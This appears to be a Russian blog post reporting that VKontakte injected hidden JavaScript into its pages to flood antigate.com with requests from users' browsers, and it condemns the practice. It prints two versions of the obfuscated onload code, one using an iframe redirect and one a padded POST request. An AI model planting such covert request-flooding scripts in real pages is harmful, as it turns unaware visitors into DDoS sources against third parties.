ВКонтакте ДДОСит antigate

Сегодня юзер с сайта roem.ru обнаружил что на страницах социальной сети ВКонтакте появился код, который без ведома пользователя шлет запросы на сайт antigate.com. Зачем это? Чтобы вывести сайт antigate из строя множеством запросов, это называется DDOS-атакой. Пользователи ВКонтакте были поневоле вовлечены в уголовно наказуемое преступление, а их компьютеры были подвергнуты возможности заражения вирусами.

Выглядит это вот так:

function _test() {
  var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();d.write('<script>this.location="http://ant'+'iga'+'te.com/i'+'n.php?'+'firs'+'t_an'+'d_la'+'st_wa'+'rnin'+'g=o'+'n";</sc'+'ript>');setTimeout(re.pbind(fr),1000);
}
<body onresize="onBodyResize()" class="is_rtl font_default" onload="_test()">

Вообще, при такой ламерской организации атаки, antigate мог бы продать весь трафик в какой-нибудь ботнет, и неплохо заработать, но antigate поступил более прикольно — сделав редирект на порносайт из iframe :) В итоге, ничего не подозревающий пользователь ВКонтакте, открывая vk.com, оказывался на порносайте.

После этого ВКонтактовцы убрали код, но лишь затем чтобы установить новый, через который уже тяжело причинить вред пользователю ВКонтакте:

function _test(){var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();d.write('<script>var XHR=window.XDomainRequest||window.XMLHttpRequest,xhr=new XHR();xhr.open("POST","http://ant'+'iga'+'te.com/i'+'n.php",true);xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");var tmp2="e8532291e45ec27a85e87692e070da98";for(i=0;i<5;++i)tmp2+=tmp2;xhr.send("method=base64&key=fb856f0ab752e3894fbdb3c4613ca924&body="+tmp2+"&ext=jpg");</sc'+'ript>');d.close();setTimeout(re.pbind(fr),1000);}

Не нужно говорить, наверное, что если бы Facebook перенаправлял своих пользователей на порносайт, хотя бы несколько секунд, то это событие получило бы большую огласку. У нас же в новостях пусто.

Можно долго спорить о том что antigate помогает спамерам, и хорошо ли его заддосить. Дело не в том какой сайт подвергся атаке, а в том что в цивилизованной стране (мы ведь хотим чтобы Россия была цивилизованной страной) крупнейшая социальная сеть, не уведомляя своих пользователей, во-первых вовлекает их в уголовно наказуемое преступление, во-вторых подвергает риску заражения вирусами их компьютеры, и в-третьих расходует их трафик, за который пользователи платят деньги.

Мне кажется методы братков из 90-х недопустимы в цивилизованном обществе.

Если вам понравилось, пожалуйста, не поленитесь кликнуть «мне нравится» или «поделиться» или «+1» чуть ниже, или кинуть ссылку на статью в свой блог или форум. Спасибо :)

Вы можете оценить эту статью: 12345

Загрузка...

Добавить комментарий

Ваш e-mail не будет опубликован.

Получать новые комментарии по электронной почте. Вы можете подписаться без комментирования.